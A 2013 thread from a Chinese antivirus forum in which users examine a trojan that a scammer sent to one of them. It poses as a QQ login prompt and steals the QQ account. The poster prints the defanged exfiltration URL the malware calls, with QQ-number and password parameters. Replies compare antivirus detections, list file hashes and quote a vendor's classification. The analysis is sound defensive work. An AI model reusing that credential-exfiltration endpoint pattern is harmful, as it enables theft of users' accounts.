查看: 8455|回复: 29
收起左侧

[病毒样本] 骗子给我发的病毒,经测试,是盗q程序。

  [复制链接]
mifanu
发表于 2013-3-2 00:34:37 | 显示全部楼层 |阅读模式
本帖最后由 mifanu 于 2013-3-6 00:40 编辑



原标题 骗子给我发的病毒,谁看看这家伙具体有什么作用?

2013-3-6 今天总算有时间实际测试一下。结果如下。

这家伙伪装成一个qq提示窗口,ps实际上你的qq好像并没有掉线这家伙做的也太不到位了吧.


然后这家伙就启动ie执行一个网址hxxp://192.74.235.251:6565/senddata.asp?1=2595**0601&2=nidongde&3=llc

hxxp://192.74.235.251:6565/senddata.asp?1=qq号&2=密码&3=llc

192.74.235.251 美国。

senddata.asp 应该就是位于这个网站上的一个发送程序,具体发送到哪儿去,就不得而知了。

很明显,这家伙看上了我的qq号

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
vm001
发表于 2013-3-2 00:36:21 | 显示全部楼层
本帖最后由 vm001 于 2013-3-2 00:39 编辑



QQ粘虫
http://fireeye.ijinshan.com/anal ... 2aa73e6591e02472284

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
mmppp9898
发表于 2013-3-2 01:08:43 | 显示全部楼层
1.0.14火绒扫描压缩包或者解压后的文件都是无视!
但双击立即拦截!
Flameocean
发表于 2013-3-2 01:24:44 | 显示全部楼层
过费尔,费尔现在没有针对粘虫类病毒,等防火墙出来了就好了,官人亲自说的
skilly
发表于 2013-3-2 02:06:45 | 显示全部楼层
      虽然这一类粘虫简陋了一点,外表做的不好,但是这样总算过了卡巴了把?


                          

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
congyin11
发表于 2013-3-2 07:46:57 | 显示全部楼层
Flameocean 发表于 2013-3-2 01:24
过费尔,费尔现在没有针对粘虫类病毒,等防火墙出来了就好了,官人亲自说的

防火墙会有键盘记录什么的吗
qq1394173891
发表于 2013-3-2 09:53:40 | 显示全部楼层
过诺顿.360扫描
过不了主防
juechao2000
发表于 2013-3-2 10:07:12 | 显示全部楼层
完整路径: c:\users\juechao2000\desktop\对账款单\对账款单.exe
威胁: WS.Reputation.1
____________________________
____________________________

在电脑上的创建时间 
不可用


上次使用时间 
2013/3/2 星期六 ( 10:06:39 )


启动项目 



已启动 


____________________________
____________________________
未知
诺顿社区中使用此文件的用户数量: 未知
____________________________
未知
此文件版本当前未知。
____________________________

此文件具有中等程度风险。
____________________________
威胁详细信息
威胁类型: 智能网络威胁。 很多迹象表明此文件不可信任,不安全
____________________________


https://att.kafan.cn/forum.php?mo ... DQyODQwNHwxNDc2ODcw



已下载文件对账款单.exe威胁名称: WS.Reputation.1

 自att.kafan.cn

文件来源树








____________________________
文件操作
对账款单.exe
已删除


平均资源使用率:
未知


平均CPU 使用率:
未知


平均内存使用率:
未知


____________________________
文件指纹 - SHA:
0d32244d3b8e7c5c5c2e910ab8bafd2016fb14b45a8485784d82920b09ed47fa
____________________________
文件指纹 - MD5:
2cc5f79880221383972fd9879ee41f6b
____________________________
dongwenqi
发表于 2013-3-2 12:58:32 | 显示全部楼层
skilly 发表于 2013-3-2 02:06
虽然这一类粘虫简陋了一点,外表做的不好,但是这样总算过了卡巴了把?

Hello,

####.exe_ - Trojan-Spy.Win32.QQSpy.c

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Config.ini

No malicious code was found in this file.

Regards, Ye Jin
Junior Virus Analyst, Kaspersky Lab.
lyqzg
发表于 2013-3-2 13:54:48 | 显示全部楼层
上报红伞
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-22 10:17 , Processed in 0.117873 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表